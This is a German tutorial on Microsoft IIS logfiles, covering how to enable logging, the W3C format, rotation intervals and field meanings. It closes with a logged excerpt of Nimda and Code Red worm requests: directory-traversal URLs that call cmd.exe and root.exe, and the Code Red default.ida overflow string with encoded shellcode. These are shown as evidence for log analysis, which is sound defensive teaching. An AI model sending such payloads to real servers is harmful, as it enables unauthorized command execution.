IIS Anfragen im Detail (Logfiles)

Webserver wie der IIS haben die Fähigkeit alles aufzuzeichnen was so passiert. Dies ist auch wichtig um analysen über das Benutzerverahlten oder eventuelle Angriffe zu treiben.
Dabei werden alle Anfragen von Webbrowsern oder anderen Clients an den WebServer in den sogenannten Logfiles gespeichert.
Dabei wird je nach Einstellung aufgezeichnet
· Wann
· Welche Seite
· Welcher Browsertyp
· Welche IP Adresse
· Ob die Anfage erfolgreich war
· Und einiges Mehr
Andere Ereignisse werden in das Eventlog des Betriebsystems geschrieben.
Die Logfiles können verwendet werden um statistische Auswertungen vorzunehmen. Z.B. können so Zugriffsgrafiken für die 10 besten Seiten erstellt werden.
Ein weiterer Anwendungszweck ist eventuelle Hacks und Sicherheitslöcher festzustellen.
Der dritte Bereich für Logfiles ist die Fehlersuche. Wenn alle Hoffnung schwindet, hilft oft ein Blick ins Logfile um eine Ahnung vom Problem zu bekommen.

Das Logging wird über die Management Konsole des IIS (MMC) aktiviert. Sie können das Format auswählen, in dem der Webserver die Benutzeraktivitäten aufzeichnet. Folgende Formate sind verfügbar:

W3C-erweitert
Microsoft IIS
NCSA allgemein

Log1

Nehmen Sie am besten das W3C Format. Das Ergebnis sieht dann wir folgt aus.

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 1998-05-02 17:42:15
#Fields: time c-ip cs-method cs-uri-stem sc-status cs-version
17:42:15 172.16.255.255 GET /default.htm 200 HTTP/1.0

Dabei kann je nach Umgebung die eingestellt werden wie oft ein neues Logfile erzeugt werden soll. Meist wird täglich gewählt. Wenn die Bewegungen aber wenige sind oder über Jahre die Zugriffe archiviert werden sollen empfiehlt sich z.B. monatlich.
Bei steigenden Traffic sollten kürzere Intervalle gewählt werden.

Log2

Ausserdem stehen Sie hier den Speicherot des Logfiles. Dies wird besonders wichtig, wenn Sie mehrere virtuelle Server betreiben, da diese in getrennte Verzeichnisse mit nichtssagenden Namen loggen.

Sie können selbst festlegen was im Logfiles alles aufgezeichnet werden soll. Also zb. die IP Adresse des Anforderers (äusserst sinnvoll). Je mehr Sie auswählen desto mehr Platz brauchen natürlich die Logdateien. Sie können übrigens auch noch z.b. per ASP META Infos in die Logfiles einfügen um noch mehr Infos über das Nutzerverhalten zu erhalten. Der Commerce Server von Microsoft nutzt dies um so das Interesse an einem bestimmten Produkt festzustellen.

Log3

Nun zur Analyse der Aufzeichnung. Was steht da alles drinnen.

Nehmen Sie am besten das W3C Format. Das Ergebnis sieht dann wir folgt aus.

Die ersten Zeilen zeigen nur den Start des Webservers an und sollten nur einmal enthalten sein.
17:42:15       Uhrzeit nach GMT
172.16.255.255 IP Adresse des Anfordereres
GET            HTTP Befehl (üblich GET und POST)
/default.htm   angeforderte Resource
200            HTTP Status Code 200 = OK, 404= File not found

Eventuell können noch der Name des authentifizierten Benutzers und andere nützlich Dinge drinnen stehen.

Der IIS kann übrigens auch die Bewegungen am SMTP oder NNTP Server aufzeichen.

So und anbei noch das Logfile mit Attacken von Code Red und Ninmda. Der mit den vielen xxx ist Code Red.

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-09-21 05:21:42
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2001-09-21 05:21:42 127.0.0.1 - 127.0.0.1 80 GET /iday/ - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0)
2001-09-21 05:56:37 212.98.160.51 - 212.6.196.182 80 GET /scripts/root.exe /c+dir 404 -
2001-09-21 05:56:39 212.98.160.51 - 212.6.196.182 80 GET /MSADC/root.exe /c+dir 403 -
2001-09-21 05:56:41 212.98.160.51 - 212.6.196.182 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-21 05:56:43 212.98.160.51 - 212.6.196.182 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-21 05:56:45 212.98.160.51 - 212.6.196.182 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-21 05:56:46 212.98.160.51 - 212.6.196.182 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-21 05:56:47 212.98.160.51 - 212.6.196.182 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-21 05:56:49 212.98.160.51 - 212.6.196.182 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2001-09-21 05:56:51 212.98.160.51 - 212.6.196.182 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2001-09-21 05:56:52 212.98.160.51 - 212.6.196.182 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-21 05:56:53 212.98.160.51 - 212.6.196.182 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 500 -
2001-09-21 05:56:55 212.98.160.51 - 212.6.196.182 80 GET /scripts/..../winnt/system32/cmd.exe /c+dir 500 -
2001-09-21 05:56:56 212.98.160.51 - 212.6.196.182 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-21 05:56:57 212.98.160.51 - 212.6.196.182 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-21 05:56:58 212.98.160.51 - 212.6.196.182 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-21 05:56:59 212.98.160.51 - 212.6.196.182 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2001-09-21 06:13:38 212.216.148.199 - 212.6.196.182 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -
2001-09-21 06:27:45 203.70.81.81 - 212.6.196.182 80 GET /scripts/root.exe /c+dir 404 -
2001-09-21 06:27:47 203.70.81.81 - 212.6.196.182 80 GET /MSADC/root.exe /c+dir 403 -

Zur grafischen Analyse müssen Sie auf Tools zurückgreifen. Einen Artikel dazu finden Sie ebenfalls auf www.devtrain.de